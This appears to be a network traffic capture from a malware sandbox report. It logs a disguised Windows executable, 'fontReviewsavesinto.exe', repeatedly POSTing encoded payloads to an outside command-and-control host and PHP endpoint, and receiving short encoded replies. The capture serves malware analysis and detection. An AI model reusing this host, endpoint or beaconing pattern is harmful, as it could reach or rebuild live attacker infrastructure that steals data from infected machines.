                                        Nov 5, 2024 08:14:04.965725899 CET183INHTTP/1.1 100 Continue
                                        Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 54 75 65 2c 20 30 35 20 4e 6f 76 20 32 30 32 34 20 30 37 3a 31 34 3a 30 32 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 34 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a 0d 0a 3f 5d 40 56
                                        Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Tue, 05 Nov 2024 07:14:02 GMTContent-Type: text/html; charset=UTF-8Content-Length: 4Connection: keep-alive?]@V


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        123192.168.2.75009337.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:14:05.115104914 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:14:05.474097967 CET1032OUTData Raw: 5e 59 43 5f 5c 5a 5a 54 5e 5e 54 55 56 5c 5a 58 5f 5a 59 58 52 59 52 51 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: ^YC_\ZZT^^TUV\ZX_ZYXRYRQYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[-'100=*'8/8 [>50'_*->%,&^'7Y$=&G!']*?
                                        Nov 5, 2024 08:14:05.918174028 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:14:05.999053001 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:14:03 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        124192.168.2.75009437.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:14:06.134085894 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        125192.168.2.75009537.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:14:06.168360949 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1300
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:14:06.520967960 CET1300OUTData Raw: 5b 5d 43 5b 5c 59 5f 52 5e 5e 54 55 56 58 5a 5f 5f 53 59 5a 52 5e 52 58 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: []C[\Y_R^^TUVXZ__SYZR^RXYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.G'"+0-=\0(^-8??5',8=>)'/.0X'7\)*&G!']*/
                                        Nov 5, 2024 08:14:06.979485989 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:14:07.063622952 CET308INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:14:05 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 152
                                        Connection: keep-alive
                                        Data Raw: 0d 15 3a 02 25 3b 3c 13 20 2a 04 1f 3c 3e 2f 05 36 27 02 04 2c 3e 37 02 25 20 3c 1e 29 11 29 08 23 17 04 58 36 03 30 59 23 2e 2b 54 2a 31 2f 5a 07 10 25 13 25 22 3c 0a 26 00 20 58 27 1d 27 5f 2a 2f 3c 10 36 3b 02 04 26 15 32 03 24 29 3f 1a 2f 17 0b 1e 2d 28 33 17 2f 31 0d 07 26 0e 2c 54 0d 10 39 52 2a 57 2b 0f 3d 3c 31 59 31 19 20 55 37 2e 3b 58 29 14 3f 09 3f 3e 21 00 27 23 34 1b 36 1c 39 52 26 2b 06 5b 27 21 28 53 31 32 25 55 2c 03 2e 56 0f 30 57 51
                                        Data Ascii: :%;< *<>/6',>7% <))#X60Y#.+T*1/Z%%"<& X''_*/<6;&2$)?/-(3/1&,T9R*W+=<1Y1 U7.;X)??>!'#469R&+['!(S12%U,.V0WQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        126192.168.2.75009637.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:14:06.292412996 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:14:06.645936012 CET1032OUTData Raw: 5b 5e 46 5d 5c 58 5a 54 5e 5e 54 55 56 5e 5a 5c 5f 55 59 59 52 59 52 5b 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: [^F]\XZT^^TUV^Z\_UYYRYR[YR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.A$ Z%-9^$Z;;=<X'/_(="V3?5&-80(#X*&G!']*7
                                        Nov 5, 2024 08:14:07.142740011 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:14:07.219276905 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:14:05 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        127192.168.2.75009737.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:14:07.354553938 CET287OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1028
                                        Expect: 100-continue
                                        Nov 5, 2024 08:14:07.708811998 CET1028OUTData Raw: 5e 59 43 5e 59 5f 5a 53 5e 5e 54 55 56 5a 5a 5b 5f 56 59 5f 52 5a 52 51 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: ^YC^Y_ZS^^TUVZZ[_VY_RZRQYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.A%2,3%Y%1;,+#*%4%<=>-$Z%3>?^$Y**&G!']*/
                                        Nov 5, 2024 08:14:08.196516991 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:14:08.269507885 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:14:06 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        128192.168.2.75009837.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:14:08.416724920 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1028
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:14:08.770930052 CET1028OUTData Raw: 5b 5c 46 5d 5c 5f 5a 53 5e 5e 54 55 56 5a 5a 50 5f 51 59 5d 52 5e 52 50 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: [\F]\_ZS^^TUVZZP_QY]R^RPYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.G3T<Y0=*$T<Z8+$_=C7$,'>&$,5'.7Y'3\=:&G!']*
                                        Nov 5, 2024 08:14:09.236253977 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:14:09.319180012 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:14:07 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        129192.168.2.75009937.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:14:09.463201046 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:14:09.817910910 CET1032OUTData Raw: 5b 5f 43 5c 59 5d 5f 50 5e 5e 54 55 56 5d 5a 51 5f 53 59 5f 52 5f 52 5b 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: [_C\Y]_P^^TUV]ZQ_SY_R_R[YR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[-'",%-&378^)%?3(=."%,93=8';$=:&G!']*
                                        Nov 5, 2024 08:14:10.275799990 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:14:10.351743937 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:14:08 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        130192.168.2.75010137.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:14:10.604638100 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:14:10.958441019 CET1032OUTData Raw: 5e 5f 43 5c 5c 5f 5a 5c 5e 5e 54 55 56 5c 5a 50 5f 57 59 58 52 58 52 59 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: ^_C\\_Z\^^TUV\ZP_WYXRXRYYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[-'!,0*$,Z;]8Z)%[$<[>&P$6Y'=_$(3):&G!']*?
                                        Nov 5, 2024 08:14:11.414113998 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:14:11.484186888 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:14:09 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        131192.168.2.75010237.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:14:11.902817011 CET287OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        132192.168.2.75010337.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:14:12.075975895 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1300
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:14:12.429265022 CET1300OUTData Raw: 5b 5f 46 5d 59 5d 5a 51 5e 5e 54 55 56 5d 5a 5f 5f 50 59 5a 52 58 52 51 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: [_F]Y]ZQ^^TUV]Z__PYZRXRQYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[-%";%>&'$Z-+_?5'7Z==Q$%'$%8<+*&G!']*
                                        Nov 5, 2024 08:14:12.886993885 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:14:12.961757898 CET308INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:14:10 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 152
                                        Connection: keep-alive
                                        Data Raw: 0d 15 39 13 24 3b 23 0f 23 39 22 57 2a 3e 02 58 22 24 30 02 2f 3d 37 00 33 0d 38 52 2b 2f 0f 0d 23 07 36 10 22 03 23 05 22 3d 2c 0b 2a 31 2f 5a 07 10 25 5b 26 1c 23 56 31 07 33 01 27 33 24 04 3d 3c 38 12 21 05 23 12 32 02 25 5a 24 3a 2f 50 2c 07 04 0f 2e 2b 37 5a 2e 31 30 5e 31 24 2c 54 0d 10 39 52 2a 08 23 0b 2a 12 36 01 26 27 34 10 23 2e 2c 03 2a 2a 0e 53 2a 3d 2a 14 27 23 27 0b 22 22 03 10 25 15 28 13 27 21 28 57 26 08 25 55 2c 03 2e 56 0f 30 57 51
                                        Data Ascii: 9$;##9"W*>X"$0/=738R+/#6"#"=,*1/Z%[&#V13'3$=<8!#2%Z$:/P,.+7Z.10^1$,T9R*#*6&'4#.,**S*=*'#'""%('!(W&%U,.V0WQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        133192.168.2.75010437.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:14:12.207422972 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:14:12.552289963 CET1032OUTData Raw: 5b 5d 43 52 5c 5d 5a 50 5e 5e 54 55 56 5f 5a 50 5f 56 59 51 52 5a 52 5d 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: []CR\]ZP^^TUV_ZP_VYQRZR]YR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.B$";0=>3'/;(_*6+',Y=63Z5'07Z=&G!']*3
                                        Nov 5, 2024 08:14:13.052994967 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:14:13.134260893 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:14:11 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        134192.168.2.75010537.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:14:13.263816118 CET287OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Nov 5, 2024 08:14:13.615267992 CET1032OUTData Raw: 5e 5e 43 58 5c 59 5a 5d 5e 5e 54 55 56 53 5a 5b 5f 53 59 51 52 5c 52 5a 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: ^^CX\YZ]^^TUVSZ[_SYQR\RZYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[-'$$:0!8\;],*0,+_**U0<_&=$^7>:&G!']*
                                        Nov 5, 2024 08:14:14.075562954 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:14:14.147263050 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:14:12 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        135192.168.2.75010637.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:14:14.298217058 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:14:14.650223970 CET1032OUTData Raw: 5b 5b 46 5d 59 5f 5a 5d 5e 5e 54 55 56 5f 5a 51 5f 5b 59 5a 52 50 52 58 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: [[F]Y_Z]^^TUV_ZQ_[YZRPRXYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[-3Z0-%]$8[/] ?%0^'$)[-0/13+$;']):&G!']*3
                                        Nov 5, 2024 08:14:15.116183043 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:14:15.191181898 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:14:13 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        136192.168.2.75010737.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:14:15.329468966 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:14:15.677252054 CET1032OUTData Raw: 5b 55 43 52 5c 5f 5f 52 5e 5e 54 55 56 5f 5a 5a 5f 50 59 5f 52 58 52 5c 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: [UCR\__R^^TUV_ZZ_PY_RXR\YR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.B''$>-X$,\888=0/#^>.P0.$ '^'[)&G!']*3
                                        Nov 5, 2024 08:14:16.140888929 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:14:16.225965977 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:14:14 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        137192.168.2.75010837.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:14:16.360526085 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:14:16.712296009 CET1032OUTData Raw: 5b 5f 43 5c 59 5c 5a 50 5e 5e 54 55 56 53 5a 58 5f 5a 59 51 52 59 52 58 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: [_C\Y\ZP^^TUVSZX_ZYQRYRXYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.F%"+39X$8/$[)8[3??_*-P3?6_$7\3;;]=:&G!']*
                                        Nov 5, 2024 08:14:17.169964075 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:14:17.248447895 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:14:15 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        138192.168.2.75010937.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
